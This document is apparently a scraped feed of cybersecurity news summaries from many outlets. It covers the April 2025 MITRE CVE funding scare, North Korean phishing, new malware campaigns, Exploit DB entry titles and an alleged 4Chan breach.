Most organizations cite low security awareness among employees as the biggest barrier to defending against cyberattacks, according to a new survey by CyberEdge Group.

by KnowBe4

First QuickBooks, then Microsoft, and now Google—will the hijacking of legitimate third-party platform communications stop escalating in 2025? Our Threat Labs researchers predict the answer is no.

by KnowBe4

A digital rights group blasted the Florida bill, but lawmakers voted to advanced the draft law.

by TechCrunch

Multiple state-sponsored hacking groups from Iran, North Korea, and Russia have been found leveraging the increasingly popular ClickFix social engineering tactic to deploy malware over a three-month period from late 2024 through the beginning of 2025. The phishing campaigns adopting the strategy have been attributed to clusters tracked as TA427 (aka Kimsuky), TA450 (aka MuddyWater),

by The Hacker News

Talking about AI: Definitions Artificial Intelligence (AI) — AI refers to the simulation of human intelligence in machines, enabling them to perform tasks that typically require human intelligence, such as decision-making and problem-solving. AI is the broadest concept in this field, encompassing various technologies and methodologies, including Machine Learning (ML) and Deep Learning. Machine

by The Hacker News

A newly upgraded version of a long-running malware strain called XorDDoS is being used to launch powerful distributed denial-of-service (DDoS) attacks, with the United States emerging as the primary target. According to new research from Cisco Talos, over 70% of attempted attacks using the XorDDoS malware between late 2023 and early 2025 were aimed at … The post New “VIP” XorDDoS Malware Targets U.S. in Global Botnet Expansion appeared first on CyberInsider.

by Cyber Insider

APIs are the backbone of modern software architecture, enabling seamless integration and innovation. However, a successful API doesn''t just appear overnight.

by Barracuda

A highly active threat group says it will release stolen information, months after an attack disrupted e-commerce operations at the grocer’s U.S. business.

by Cybersecurity Dive

Learn more about how Legit is helping enterprises prevent vulnerabilities in their SDLCs.

by Legit Security

Get details on the key capabilities for an ASPM platform. 

by Legit Security

Entrust has announced the Entrust Cryptographic Security Platform, for release in May. The platform is a unified, end-to-end cryptographic security management solution for keys, secrets, and certificates. Cyberattacks on data security and identity systems are exploding in scale and sophistication. Traditional approaches to securing data and identities aren’t working, and in digital-first environments every connected […] The post Entrust Announces all-in-one Cryptographic Security Platform appeared first on IT Security Guru.

by IT Security Guru

ISACA and the Chartered Institute of Internal Auditors (Chartered IIA), have sent a letter to Rt Hon Jonathan Reynolds MP, Secretary of State for Business and Trade, stressing the urgent need for audit reform legislation to boost digital resilience. The letter underlines strong stakeholder support for the Audit Reform and Corporate Governance Bill promised in […] The post ISACA and Chartered IIA pen open letter to UK Government urging swift audit reform to build digital resilience appeared first on IT Security Guru.

by IT Security Guru

A critical security vulnerability has been disclosed in the Erlang/Open Telecom Platform (OTP) SSH implementation that could permit an attacker to execute arbitrary code sans any authentication under certain conditions. The vulnerability, tracked as CVE-2025-32433, has been given the maximum CVSS score of 10.0. ""The vulnerability allows an attacker with network access to an Erlang/OTP SSH server

by The Hacker News

Blockchain is best known for its use in cryptocurrencies like Bitcoin, but it also holds significant applications for online authentication. As businesses in varying sectors increasingly embrace blockchain-based security tools, could the technology one day replace passwords? How blockchain works  Blockchain is a secure way to maintain, encrypt, and exchange digital records of transactions.

by The Hacker News

Apple has released a security update for iOS and iPadOS to patch two zero-day vulnerabilities which are reported to already have been exploited...

by Malwarebytes Labs

After threatening to slash support for the CVE program, CISA threw MITRE a lifeline at the last minute — extending its government contract for another 11 months. After that, it looks like it''s up to the private sector to find the cash to keep it going.

by Dark Reading

The Tor Project has released version 14.5 of its privacy-focused browser, introducing the long-awaited Connection Assist feature to Android. This update significantly enhances the usability of Tor in regions where the network is actively blocked, alongside improvements in localization and overall stability across platforms. Tor Browser is the flagship tool developed by The Tor Project, … The post Tor Browser 14.5 Brings Censorship-Busting Connection Assist to Android appeared first on CyberInsider.

by Cyber Insider

The New Jersey attorney general claims Discord’s features to keep children under 13 safe from sexual predators and harmful content are inadequate.

by WIRED Security News

In a stunning development, the security world as we knew it spiraled into disarray on April 15, 2025, after MITRE... The post CVE wake-up call: What’s ahead after the MITRE funding fiasco appeared first on Sysdig.

by Sysdig

Microsoft is calling attention to an ongoing malvertising campaign that makes use of Node.js to deliver malicious payloads capable of information theft and data exfiltration. The activity, first detected in October 2024, uses lures related to cryptocurrency trading to trick users into installing a rogue installer from fraudulent websites that masquerade as legitimate software like Binance or

by The Hacker News

If security tools are challenging to use, people will look for workarounds to get around the restrictions.

by Dark Reading

AttackIQ has released three new attack graphs designed to emulate the Tactics, Techniques, and Procedures (TTPs) associated with StrelaStealer observed in its most recent activities, enabling defenders to test and validate their detection and response capabilities. The post Emulating the Stealthy StrelaStealer Malware appeared first on AttackIQ.

by AttackIQ

Earlier this year SpiderLabs observed an increase in mass scanning, credential brute forcing, and exploitation attempts originating from Proton66 ASN targeting organizations worldwide that we are discussing in a two-part series.

by SpiderLabs Blog

Who Is the China-Nexus Group UNC5221? UNC5221 is a suspected China-nexus cyber-espionage group known for aggressively targeting edge network devices (VPNs, firewalls, routers) with zero-day exploits since at least 2023 [1]. The group has repeatedly compromised Ivanti’s Pulse Connect Secure/Ivanti Connect Secure (ICS) VPN appliances through multiple vulnerabilities, demonstrating a knack for quickly leveraging new flaws. 

by Picus Security

CISA added the high-severity flaw, initially disclosed in 2021, to its known exploited vulnerabilities catalog this week.

by Cybersecurity Dive

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Wednesday added a security flaw impacting SonicWall Secure Mobile Access (SMA) 100 Series gateways to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The high-severity vulnerability, tracked as CVE-2021-20035 (CVSS score: 7.2), relates to a case of operating system command injection

by The Hacker News

Massive Blue is helping cops deploy AI-powered social media bots to talk to people they suspect are anything from violent sex criminals all the way to vaguely defined “protesters.”

by WIRED Security News

Cisco Talos observed the ongoing global spread of the XorDDoS malware, predominantly targeting the United States, with evidence suggesting Chinese-speaking operators are using sophisticated tools to orchestrate widespread attacks.

by Cisco Talos Blog

Many businesses around the world are taking the decision to alter their supplier mix in the face of tariff uncertainty, but in doing so are creating more cyber risks for themselves, according to a report

by ComputerWeekly

The number of infostealers sent through phishing emails jumped by 84% last year. IBM X-Force offers these recommendations for defending yourself from all manner of malware.

by ZDNET Security

Apple''s iOS 18.4.1 update fixes a bug with wireless CarPlay and resolves two security holes already exploited in targeted attacks.

by ZDNET Security

By moving testing, security, and code reviews earlier in the development cycle, Agile shift-left strategies — powered by automation and AI — reduce risks, cut costs, and boost software quality.

by ITPro Today

Apple on Wednesday released security updates for iOS, iPadOS, macOS Sequoia, tvOS, and visionOS to address two security flaws that it said have come under active exploitation in the wild. The vulnerabilities in question are listed below - CVE-2025-31200 (CVSS score: 7.5) - A memory corruption vulnerability in the Core Audio framework that could allow code execution when processing an audio

by The Hacker News

This first installment of a three-part series introduces essential SQL commands for creating, modifying, and deleting tables within SQL Server Management Studio.

by ITPro Today

The rise of DeepSeek has prompted the usual well-documented concerns around AI, but also raised worries about its potential links to the Chinese state. The Security Think Tank considers the steps security leaders can take to counter threats posed by nation state industrial espionage?

by ComputerWeekly

MysterySnail RAT attributed to IronHusky APT group hasn’t been reported since 2021. Recently, Kaspersky GReAT detected new versions of this implant in government organizations in Mongolia and Russia.

by Securelist

The agency is asking organizations to come forward if they detect suspicious activity or other evidence of a compromise.

by Cybersecurity Dive

Several years ago, a security researcher discovered a vulnerability in Google Chrome that allowed fake domains to bypass the browser’s security measures. The researcher registered a domain that appeared as “xn--80ak6aa92e.com” but displayed as “apple.com” in the browser, demonstrating how easy it was to deceive users. This is just one example of what’s known as […] The post Homograph attacks: How hackers exploit look-alike domains appeared first on Outpost24.

by Outpost24

The reopening of the decades-closed Sukhumi Babushara Airport and a test flight from Moscow demonstrate Russia’s push for control over occupied Abkhazia The post Russia expands its strategic footprint in occupied Abkhazia  appeared first on DFRLab.

by DFRLab

Gartner projects IT security spending in the MENA region will continue to increase in 2025, with security services accounting for the most growth.

by Dark Reading

See how Darktrace Cyber AI Analyst™, an agentic AI virtual analyst, cuts through alert noise, accelerates threat response, and strengthens your security team — all without adding headcount.

by Darktrace

An Indian disaster-relief flight delivering aid is the latest air-traffic incident, as attacks increase in the Middle East and Myanmar and along the India-Pakistan border.

by Dark Reading

by CrowdStrike

AnyDesk 9.0.1 - Unquoted Service Path

by Exploit DB

compop.ca 3.5.3 - Arbitrary code Execution

by Exploit DB

Blood Bank & Donor Management System 2.4 - CSRF Improper Input Validation

by Exploit DB

Usermin 2.100 - Username Enumeration

by Exploit DB

Angular-Base64-Upload Library 0.1.21 - Unauthenticated Remote Code Execution (RCE)

by Exploit DB

ABB Cylon Aspect 3.08.02 (ethernetUpdate.php) - Authenticated Path Traversal

by Exploit DB

ABB Cylon Aspect 3.08.02 (deployStart.php) - Unauthenticated Command Execution

by Exploit DB

TP-Link VN020 F3v(T) TT_V6.2.1021 - Denial Of Service (DOS)

by Exploit DB

TP-Link VN020 F3v(T) TT_V6.2.1021 - Buffer Overflow Memory Corruption

by Exploit DB

Explore how Iran is leveraging AI for cyberwarfare, influence ops, military tech, and domestic surveillance. A deep dive into Tehran’s top-down AI strategy, partnerships with China and Russia, and implications for global security.

by Recorded Future

<p>I'm still pretty new to hardware hacking and find myself going through a lot of media (both text and moving pictures) about various techniques to interact with IoT devices and hardware in general. One of the tasks for a…</p>

by TrustedSec

Agent Tesla, Remcos RAT and XLoader delivered via a complex phishing campaign. Learn how attackers are using multi-stage delivery to hinder analysis. The post Cascading Shadows: An Attack Chain Approach to Avoid Detection and Complicate Analysis appeared first on Unit 42.

by Palo Alto Networks - Unit42

Cybersecurity researchers have detailed four different vulnerabilities in a core component of the Windows task scheduling service that could be exploited by local attackers to achieve privilege escalation and erase logs to cover up evidence of malicious activities. The issues have been uncovered in a binary named ""schtasks.exe,"" which enables an administrator to create, delete, query, change,

by The Hacker News

The former cybersecurity chief is the latest to push back on the Trump administration''s targeting of critics and dissenters.

by TechCrunch

The attacks have been going on since shortly after Microsoft patched the vulnerability in March.

by Dark Reading

Bots now account for half of all internet traffic, according to a new study that shows how non-human activity has grown online.

by Malwarebytes Labs

Researchers discovered new variants of the malware, which is tied to a China-nexus threat group, targeting Windows environments of critical infrastructure networks in Europe.

by Dark Reading

At the last possible moment, CISA confirms funding for the CVE program for another eleven months.

by ThreatDown

Trend Micro researchers detailed an emerging ransomware campaign by a new group known as "CrazyHunter" that is targeting critical sectors in Taiwan.

by Dark Reading

The CVE Program is the primary way software vulnerabilities are tracked. Its long-term future remains in limbo even after a last-minute renewal of the US government contract that funds it.

by WIRED Security News

Changes aim to tighten integration with the National Institute of Standards and Technology''s Cybersecurity Framework and help organizations develop a stronger posture to handle privacy risks.

by Dark Reading

Expired US government funding nearly disrupted this global security system. How can we prevent this from happening again in 11 months?

by ZDNET Security

VIENNA, VA (April 14, 2025) – The Retail & Hospitality Information Sharing and Analysis Center (RH-ISAC) announced its 2025 award winners during the annual membership meeting held on 9 April in St. Louis, Missouri. The awards recognize outstanding companies and individuals who have displayed extraordinary dedication to RH-ISAC’s mission to build a collaborative sharing community...

by RH-ISAC

One of the bugs was discovered by Google''s security researchers who investigate government-backed cyberattacks.

by TechCrunch

Google on Wednesday revealed that it suspended over 39.2 million advertiser accounts in 2024, with a majority of them identified and blocked by its systems before it could serve harmful ads to users. In all, the tech giant said it stopped 5.1 billion bad ads, restricted 9.1 billion ads, and blocked or restricted ads on 1.3 billion pages last year. It also suspended over 5 million accounts for

by The Hacker News

Today, the cybersecurity community faced a critical juncture as the U.S. government''s contract with MITRE Corporation to develop, operate and modernize the Common Vulnerabilities and Exposures (CVE) program, as well as related efforts like CWE, was set to expire.

by Barracuda

Threat actors are leveraging an artificial intelligence (AI) powered presentation platform named Gamma in phishing attacks to direct unsuspecting users to spoofed Microsoft login pages. ""Attackers weaponize Gamma, a relatively new AI-based presentation tool, to deliver a link to a fraudulent Microsoft SharePoint login portal,"" Abnormal Security researchers Callie Hinman Baron and Piotr Wojtyla

by The Hacker News

Introduction Cyber threats targeting supply chains have become a growing concern for businesses across industries. As companies continue to expand their reliance on third-party vendors, cloud-based services, and global logistics networks, cybercriminals are exploiting vulnerabilities within these interconnected systems to launch attacks. By first infiltrating a third-party vendor with undetected

by The Hacker News

A fix for a critical flaw in a tool allowing organizations to run GPU-accelerated containers released last year did not fully mitigate the issue, spurring the need to patch a secondary flaw to protect organizations that rely on NVIDIA processors for AI workloads.

by Dark Reading

In today''s cybersecurity landscape, organizations face an ever-present and often underestimated threat: human risk. Despite significant advancements in technological defenses, human error remains a leading cause of data breaches and security incidents.

by KnowBe4

Researchers at Hoxhunt have found that AI agents can now outperform humans at creating convincing phishing campaigns.

by KnowBe4

Cybersecurity researchers have unearthed a new controller component associated with a known backdoor called BPFDoor as part of cyber attacks targeting telecommunications, finance, and retail sectors in South Korea, Hong Kong, Myanmar, Malaysia, and Egypt in 2024. ""The controller could open a reverse shell,"" Trend Micro researcher Fernando Mercês said in a technical report published earlier in

by The Hacker News

Apple''s solution is called ''differential privacy'' - and it''s already been using it for Genmojis.

by ZDNET Security

Intro: Why hack in when you can log in? SaaS applications are the backbone of modern organizations, powering productivity and operational efficiency. But every new app introduces critical security risks through app integrations and multiple users, creating easy access points for threat actors. As a result, SaaS breaches have increased, and according to a May 2024 XM Cyber report, identity and

by The Hacker News

This is the first time representatives for the spyware maker have publicly named its government customers.

by TechCrunch

Cloud misconfigurations and cryptography flaws plague some of the top apps used in work environments, exposing organizations to risk and intrusion.

by Dark Reading

Concerns about the future of the MITRE CVE Program continue to circulate. The Tenable Security Response Team has created this FAQ to help provide clarity and context around this developing situation.BackgroundThe Tenable Security Response Team has compiled this blog to answer Frequently Asked Questions (FAQ) regarding changes around the MITRE CVE Program. As the situation continues to evolve, we will continue to provide updates as new information is released.FAQWhat is the current status of the MITRE CVE Program?As of April 16, 2025, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has extended funding for the MITRE CVE Program for one year. In a post and update to their website, CISA confirmed the extension, and a spokesperson added that they “executed the option period on the contract to ensure there will be no lapse in critical CVE services.”pic.twitter.com/DYv4uKzLrq— Cybersecurity and Infrastructure Security Agency (@CISAgov) April 16, 2025When did CVE Board Members find out about the expiration of the MITRE CVE Program and other related programs?CVE Board members received a notification from MITRE on April 15, 2025. This notification was circulated on social media and picked up in news articles. Tenable published a blog post about the forthcoming expiration and updated it on April 16 upon news of the subsequent renewal.What is the importance of the CVE Program?The CVE Program provides the industry with a common identifier used for identifying vulnerabilities which in turn allows the industry to fully track all affected products, remediations, tactics, techniques and procedures (TTPs) and risk measurements for a vulnerability. Without this we run the risk of being unable to accurately map active exploitation and associated risk to that vulnerability.One important function that the CVE program serves is to operate as a CVE Naming Authority (CNA) of last resort, particularly when there are disputes over CVE issuance. This helps to minimize conflicting reports and duplicate records.What is the value of having a CVE Naming Authority (CNA)?The CVE Program enables various entities to become a CNA. The CNA program allows vendors, researchers, open source developers and others to reserve and assign CVEs while providing information about a vulnerability. Currently there are over 450 CNAs that participate in the CVE Program.What is Tenable’s relationship with the CVE Program?Tenable is a CNA within the CVE Program and, as such, issues CVEs for its own products and vulnerabilities in other products discovered by its research team for which there is no CNA.What about the announcements of efforts from the CVE Foundation and GCVE?On the morning of April 16, 2025, the CVE Foundation published a press release regarding an effort for transitioning the CVE program to a non-profit foundation established by active CVE Board members. The CVE Foundation aims to move the CVE Program away from a government-funded project to eliminate the risk of “a single point of failure in the vulnerability management ecosystem.”Additionally, we are aware of other efforts being launched, including the Global CVE (GCVE) allocation system by the Computer Incident Response Center Luxembourg (CIRCL). According to their FAQ, GCVE is a “decentralized system for identifying and numbering security vulnerabilities.” The GCVE site notes that existing CNAs can become GCVE Numbering Authorities (GNAs) and would have autonomy to define their own policies for the identification of vulnerabilities.Tenable will continue to monitor these evolving efforts surrounding CVE and other programs and update the community as we learn more.How is Tenable impacted by the interruptions to CVE issuance at both MITRE and the National Vulnerability Database (NVD)?With uncertainty around interruptions to the CVE Program, Tenable has reserved a sufficient number of CVEs for disclosing vulnerabilities in our products and those discovered in other products.Tenable is not dependent on either MITRE or NVD for sourcing the logic needed to determine if a product is vulnerable or not. We source our coverage from vendor advisories, which will enable us to continue providing coverage as long as vendors publish security advisories.Get more informationTenable Blog: MITRE CVE Program Funding Extended For One YearTenable Blog: Recent NVD Delays Won’t Affect Tenable Vulnerability Management Customers Thanks To Our Diverse Scoring SourcesCVE FoundationGlobal CVE Allocation System (GCVE)Join Tenable''s Security Response Team on the Tenable Community.Learn more about Tenable One, the Exposure Management Platform for the modern attack surface.

by Tenable

The company is investigating.

by ZDNET Security

A new variant of the hello pervert emails claims that the target''s system is infected with njRAT and spoofs the victims email address

by Malwarebytes Labs

The concept of responsible disclosure is a simple one. If you find a vulnerability, you let the affected organization or software vendor know before making the information public. This gives them time to patch the vulnerability before it can be exploited. It also helps maintain trust and fosters a collaborative environment between security researchers and […] The post Responsible vulnerability disclosure: Why it matters appeared first on Outpost24.

by Outpost24

The Common Vulnerabilities and Exposures (CVE) Program is one of the most central programs in cybersecurity, so news that MITRE’s contract to run the program was expiring sent shock waves through the cybersecurity community on April 15. But fears for the future of the globally recognized program underpinning vulnerability management were assuaged when CISA announced today that it was extending the MITRE CVE contract. The extension apparently is for 11 months, sources told The Cyber Express. In a statement today to The Cyber Express, a spokesperson for the U.S. Cybersecurity and Infrastructure Security Agency (CISA) said: “The CVE Program is invaluable to cyber community and a priority of CISA. Last night, CISA executed the option period on the contract to ensure there will be no lapse in critical CVE services. We appreciate our partners’ and stakeholders’ patience.” It’s not clear what the long-term future of the CVE program will be – CISA had floated the idea of bringing it in-house despite its own budget and staffing cuts – but at least for now, the program will continue as is. MITRE CVE Contract Raises Cybersecurity Concerns The panic started on April 15 with news of a letter to the CVE Board from Yosry Barsoum, Vice President and Director of MITRE’s Center for Securing the Homeland, warning of the contract’s imminent expiration. “If a break in service were to occur, we anticipate multiple impacts to CVE, including deterioration of national vulnerability databases and advisories, tool vendors, incident response operations, and all manner of critical infrastructure,” Barsoum wrote (image below). [caption id=""attachment_102101"" align=""aligncenter"" width=""800""] MITRE CVE contract letter[/caption] MITRE released this statement in response to media inquiries: “On Wednesday, April 16, 2025, funding for MITRE to develop, operate, and modernize the Common Vulnerabilities and Exposures (CVE) Program and related programs, such as the Common Weakness Enumeration (CWE) Program, will expire. The government continues to make considerable efforts to support MITRE’s role in the program and MITRE remains committed to CVE as a global resource.” MITRE noted how valuable the program is to a wide range of cybersecurity services: “The CVE Program anchors a growing cybersecurity vendor market worth more than $37 billion, providing foundational data to vendor products across vulnerability management, cyber threat intelligence, security information and event management, and endpoint detection and response.” MITRE said historical CVE records will be available on GitHub at https://github.com/CVEProject, and also directed those seeking more information to visit the official CVE.org website. In response to news of the 11-month contract extension, Barsoum released the following statement today: ""Thanks to actions taken by the government, a break in service for the Common Vulnerabilities and Exposures (CVE) Program and the Common Weakness Enumeration (CWE) Program has been avoided. As of Wednesday morning, April 16, 2025, CISA identified incremental funding to keep the Programs operational. We appreciate the overwhelming support for these programs that have been expressed by the global cyber community, industry, and government over the last 24 hours. The government continues to make considerable efforts to support MITRE’s role in the program and MITRE remains committed to CVE and CWE as global resources."" CVE Foundation, EU Vulnerability Database Launched Amid the uncertainty, a non-profit CVE Foundation has been launched by several CVE Board members ""to ensure the long-term viability, stability, and independence of the Common Vulnerabilities and Exposures (CVE) Program."" The new CVE Foundation will focus solely on continuing the mission of delivering high-quality vulnerability identification and maintaining the integrity and availability of CVE data for defenders worldwide,"" the group stated. “CVE, as a cornerstone of the global cybersecurity ecosystem, is too important to be vulnerable itself,” stated Kent Landfield, an officer of the Foundation. “Cybersecurity professionals around the globe rely on CVE identifiers and data as part of their daily work—from security tools and advisories to threat intelligence and response. Without CVE, defenders are at a massive disadvantage against global cyber threats.” The EU also launched its own vulnerability database in response to the uncertainty. Easterly: Serious Implications for Business Risk In an April 15 post on LinkedIn, former CISA Director Jen Easterly said news of the MITRE contract expiration was “rightly raising alarms across the cybersecurity community. While this may sound like a technical issue, it has SERIOUS implications for business risk, operational resilience, and national security.” “The CVE system may not make headlines, but it is one of the most important pillars of modern cybersecurity,” she added. Any disruption would also come amid an enduring backlog in processing CVEs in the National Vulnerability Database (NVD) at the National Institute of Standards and Technology (NIST). With more than 40,000 new vulnerabilities discovered last year, NIST continues to struggle with the volume of new vulnerabilities.  

by The Cyber Express

Memory safety vulnerabilities remain among the most widespread and exploited security issues. They occur in C and C++ projects, which are widely used across embedded systems, including automotive, medical devices, and avionics. Read on to learn why they can happen and how to prevent them. Content What Are Memory Safety Issues Why Memory Safety Matters Real-World Examples of Memory Corruption Example of a Memory Safety Bug How to Detect Memory Corruption

by Code Intelligence

Engaging with the C-suite is not just about addressing security concerns or defending budget requests. It''s about establishing and maintaining an ongoing discussion that aims to align security objectives with the interests of the business.   The post Communicating Security to the C-Suite: A Strategic Approach  appeared first on Black Hills Information Security, Inc..

by Black Hills Information Security

Active Directory is one of the most vulnerable access points in an organization''s IT environment. Companies cannot wait for a real attack to pressure-test their AD recovery strategy.

by Dark Reading

Key Points Introduction NTLM (New Technology LAN Manager) is a suite of authentication protocols developed by Microsoft to verify user identities and protect the integrity and confidentiality of network communications. NTLM operates through a direct client-server exchange known as the NTLM challenge/response mechanism, in which the server challenges the client to prove its identity without […] The post CVE-2025-24054, NTLM Exploit in the Wild appeared first on Check Point Research.

by Check Point Research

Introducing Kubernetes 1.33: Cloud-native improvements for dev and security teams The Kubernetes 1.33 release continues the project’s momentum in delivering... The post Kubernetes 1.33 – What’s new? appeared first on Sysdig.

by Sysdig

Learn how Darktrace’s DEMIST-2 embedding model delivers high-accuracy threat classification and detection across any environment, outperforming larger models with efficiency and precision.

by Darktrace

Discover how Darktrace’s new DIGEST model enhances Cyber AI Analyst by using GNNs and RNNs to score and prioritize threats with expert-level precision before damage is done.

by Darktrace

Cheap Android smartphones manufactured by Chinese companies have been observed pre-installed with trojanized apps masquerading as WhatsApp and Telegram that contain cryptocurrency clipper functionality as part of a campaign since June 2024. While using malware-laced apps to steal financial information is not a new phenomenon, the new findings from Russian antivirus vendor Doctor Web point to

by The Hacker News

Relevance is the #1 most important factor in determining whether or not your cold email will generate a reply. This article covers how to source your B2B lead data and how to leverage it to send truly relevant emails.

by The Hunter Blog

The Cybersecurity Information Sharing Act of 2015, set to expire in September, “moved the needle.”

by Cybersecurity Dive

Cisco Talos’ Vulnerability Discovery & Research team recently disclosed three vulnerabilities found in Eclipse ThreadX and four vulnerabilities in STMicroelectronics.   The vulnerabilities mentioned in this blog post have been patched by their respective vendors, all in adherence to Cisco’s third-party vulnerability disclosure policy. 

by Cisco Talos Blog

Sophos India volunteers transformed two rural schools with vibrant murals, enhancing learning spaces and strengthening community ties.

by Sophos News

The information security industry feared a lapse would lead to industrywide exposures of software vulnerabilities.

by Cybersecurity Dive

The US Cybersecurity and Infrastructure Security Agency has ridden to the rescue of the under-threat Mitre CVE Programme, approving a last-minute, 11-month contract extension to preserve the project’s vital security vulnerability work

by ComputerWeekly

With news that Mitre’s contract to run the world-renowned CVE Programme is abruptly terminating, a breakaway group is setting up a non-profit foundation to try to ensure the project’s continuity

by ComputerWeekly

North Korean hackers sent more than 120,000 phishing emails to nearly 18,000 individuals over a three-month campaign that impersonated South Korea’s Military Counterintelligence Command''s communication during the Martial Law turmoil, the National Police Agency said Wednesday. The campaign began in November 2024 and continued through January 2025, targeting professionals in the unification, defense, national security, and foreign affairs sectors. Police confirmed North Korea''s involvement through forensic analysis of the phishing infrastructure, IP addresses, and language patterns tied to past operations. “Our investigation has confirmed that North Korea was behind the emails distributed on Dec. 11, 2024, bearing the subject line, ‘Disclosure of Defense Counterintelligence Command Martial Law Documents,’” Kim Young-woon, head of the agency’s cyber terrorism unit, said during the press briefing. “Historically, North Korea would send hand-crafted emails impersonating analysts or experts, offering geopolitical forecasts or New Year’s speech analyses,” Kim said. “Now, they’ve automated the process, enabling mass distribution.” Authorities said at least 570 individuals clicked on the phishing bait and likely exposed sensitive data, including emails and contact lists. Recycled Infrastructure and Targeted Deception The hackers used 15 overseas servers rented through foreign providers and deployed custom-built malware capable of tracking real-time metrics. Investigators said the malware that looked to be an info-stealer monitored whether emails were opened, if users clicked on embedded links, and whether they submitted account credentials. North Korea reused servers previously identified in earlier state-backed cyberattacks. The infrastructure also showed evidence of searches for North Korean defector data and South Korean military information. Browser logs included North Korean dialects, strengthening attribution. Each phishing email mimicked government alerts or official communication. Subject lines included fake military documents, New Year’s policy analyses, and even invitations to concerts by South Korean celebrities. Others posed as tax refunds, horoscope readings, or health advisories. Deceptive Links Spread Under the Guise of Martial Law Deployment The emails directed users to spoofed login portals that closely resembled major South Korean web services like Naver, Kakao, and even Google. Domains included subtle misspellings or character swaps—such as googlauth.com, naver-auth.com, or baernin.com. Many email addresses appeared to come from government domains or closely resembled personal contacts. Spoofing methods included: Adding terms like -news, -noreply, or -report to legitimate domains. Mimicking friends’ or colleagues’ addresses with subtle variations (e.g., adding a single letter). Using lookalike domain names with common misspellings (m as rn, or co.kr altered to co.kro.kr). Out of the 17,744 recipients, 120 individuals fell for the phishing attempt, entering their credentials and granting attackers access to inbox contents and stored contact information. Warnings to the Public The South Korean government urged the public to remain vigilant against phishing threats, especially those disguised as official communication. Authorities advised against opening unfamiliar emails, clicking suspicious links, or downloading unverified attachments. “Never input your ID or password without verifying the legitimacy of the request,” the police warned. “Look carefully at the email sender and website domain. Even minor differences can signal fraud.” Officials also recommended regularly reviewing account login histories and enabling multi-factor authentication wherever possible. A Coordinated, Persistent Threat The investigation showed that the phishing campaign was both well-organized and sustained, reflecting a broader pattern in North Korea’s cyber playbook. Previous incidents linked to Pyongyang include attacks on cryptocurrency platforms, espionage efforts targeting defense sectors, and global disinformation operations. South Korean authorities reiterated their readiness to respond decisively to any form of cyber aggression. The police pledged enhanced coordination with international partners and local cybersecurity agencies. “We are mobilizing our full law enforcement capability,” the Police chief said. “Cyberthreats, especially those linked to hostile nations, will be met with swift and strong responses.” Public Disclosure Justified Under South Korea’s Public Information Rules on Criminal Investigations, the case was disclosed to the media to help prevent similar attacks. The government cited two justifications: The need to prevent recurrence by informing the public of phishing tactics. The importance of limiting the spread of harm by raising awareness. This disclosure falls in line with past efforts to inform citizens of advanced cyber threats, particularly those involving national security and public institutions. Ongoing Investigations The investigation remains open as cybersecurity experts continue tracking North Korea’s infrastructure and tactics. South Korea’s Cyber Terror Response Division is working closely with the Korea Internet & Security Agency (KISA) and other international stakeholders. Police urged anyone who suspects they received a spoofed message to report it immediately to national authorities and avoid interacting with the email in any way. “Cybersecurity is a collective effort,” said the Police said. “Every report helps us build a stronger defense against these malicious campaigns.”

by The Cyber Express

The U.S. government funding for non-profit research giant MITRE to operate and maintain its Common Vulnerabilities and Exposures (CVE) program will expire Wednesday, an unprecedented development that could shake up one of the foundational pillars of the global cybersecurity ecosystem. The 25-year-old CVE program is a valuable tool for vulnerability management, offering a de facto standard to

by The Hacker News

On April 14, 2025, 4Chan, the infamous anonymous image board, experienced downtime due to unexplained outages that left users frustrated and speculating about the cause. While the exact reason for the downtime remains uncertain, some users have suggested that a cyberattack or hacking incident could be responsible.   According to DownDetector, a service that monitors website disruptions, a surge in user reports highlighted the problems with 4Chan. The issues were largely related to the website itself (72%), server connections (24%), and posting (4%). These reports spiked around 10 p.m. on April 14 and continued into the next day, with many users complaining that 4Chan was intermittently down for hours.  4Chan Hacking and Leaked Data Raise Concerns  [caption id=""attachment_102086"" align=""alignnone"" width=""945""] Downdetector showing outage data for 4Chan (Source: Downdetector)[/caption] As the outage continued, several screenshots allegedly showing 4Chan’s backend surfaced on social media. These images appeared to display source code, templates for banning users, and a list of moderators and ""janitors""—users with limited administrative rights.   The leaked data even included personal information like email addresses tied to 4Chan moderators, sparking further suspicion that the site had been hacked. These leaks appeared to coincide with the downtime, leading to increased speculation about a potential cyberattack on 4Chan.  4Chan''s Controversial History with Cyberattacks  4Chan has long been associated with controversy and cyberattacks. The platform, which offers complete anonymity for users to post images and text, has repeatedly been the subject of boycotts, both from users and advertisers, as well as accusations that it hosts hate speech and illegal content. It has even been linked to inspiring mass shootings and other violent events.   Additionally, users on 4Chan have been involved in planning cyberattacks, including Distributed Denial-of-Service (DDoS) campaigns. On top of that, 4Chan has been home to the propagation of conspiracy theories, some of which have led to real-world consequences, such as the January 6 insurrection at the U.S. Capitol.  Given its reputation, the recent downtime and the potential cyberattack on 4Chan have fueled further rumors about the platform''s vulnerability. Some users have speculated that the site was breached, while others believe it could be a result of long-standing software vulnerabilities that 4Chan has yet to address.  Alleged Hack and Doxxing  The rumors surrounding the potential cyberattack gained traction after a previously banned 4Chan board briefly reappeared online, followed by a defacing message that read, ""U GOT HACKED XD."" Shortly thereafter, an online account on a rival forum, Soyjak.party, posted screenshots allegedly revealing parts of 4Chan''s backend systems, including usernames and email addresses of 4Chan’s administrators and moderators. These leaks quickly escalated into a wave of doxxing, where users shared personal details of the 4Chan staff, including photos and other private information.  Though the validity of these claims remains unclear, TechCrunch reported that one 4Chan moderator believed the leak and cyberattack were genuine. Despite multiple attempts, WIRED could not reach 4Chan for an official statement, further deepening the uncertainty surrounding the incident.  Conclusion   The recent alleged cyberattack on 4Chan highlights the platform’s ongoing struggles with outdated software, security vulnerabilities, and its controversial reputation. Despite previous reassurances from the site''s founder, Christopher Poole, regarding security improvements, it appears that 4Chan''s legacy of hosting questionable content and attracting extremist users has left it susceptible to breaches.   Over the years, the platform''s transformation from a niche space for anime fans to a hub for more nefarious activities has only deepened its notoriety. While the exact cause of the recent attack remains unclear, it is evident that 4Chan continues to face security challenges, not just in terms of securing its infrastructure but also in managing its reputation.

by The Cyber Express

These are the tools of the trade Sophos detected in use by cybercriminals over 2024

by Sophos News

Ransomware remains the biggest threat, but old and misconfigured network devices are making it too easy

by Sophos News

A proper detection engineering program can help improve SOC operations. In this article we''ll discuss potential SOC issues, the necessary components of a detection engineering program and some useful metrics for evaluating its efficiency.

by Securelist

